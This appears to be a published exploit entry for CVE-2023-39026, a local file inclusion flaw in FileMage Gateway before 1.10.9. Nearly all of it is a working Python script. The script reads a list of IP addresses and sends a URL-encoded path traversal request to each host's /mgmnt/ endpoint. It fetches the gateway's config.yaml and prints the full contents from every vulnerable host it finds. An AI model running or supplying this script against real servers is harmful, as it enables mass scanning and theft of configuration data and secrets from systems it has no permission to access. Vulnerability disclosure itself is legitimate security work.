FileMage Gateway 1.10.9 - Local File Inclusion - CVE-2023-39026

1. # Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion
2. # Date: 8/22/2023
3. # Exploit Author: Bryce "Raindayzz" Harty  
4. # Vendor Homepage: https://www.filemage.io/
5. # Version: Azure Versions < 1.10.9
6. # Tested on: All Azure deployments < 1.10.9
7. # CVE : CVE-2023-39026
8.  
9. # Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
10. # Patch from vendor - https://www.filemage.io/docs/updates.html
11.  
12. import requests
13. import warnings
14. warnings.filterwarnings("ignore")
15. def worker(url):
16.     response = requests.get(url, verify=False, timeout=.5)
17.     return response
18. def main():
19.     listIP = []
20.     file_path = input("Enter the path to the file containing the IP addresses: ")
21.     with open(file_path, 'r') as file:
22.         ip_list = file.read().splitlines()
23.         searchString = "tls"
24.         for ip in ip_list:
25.             url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"
26.             try:
27.                 response = worker(url)
28.                 #print(response.text)
29.                 if searchString in response.text:
30.                     print("Vulnerable IP: " + ip)
31.                     print(response.text)
32.                     listIP.append(ip)
33.             except requests.exceptions.RequestException as e:  
34.                 print(f"Error occurred for {ip}: {str(e)}")
35.  
36.     for x in listIP:
37.         print(x)
38. if __name__ == '__main__':
39.     main()
40.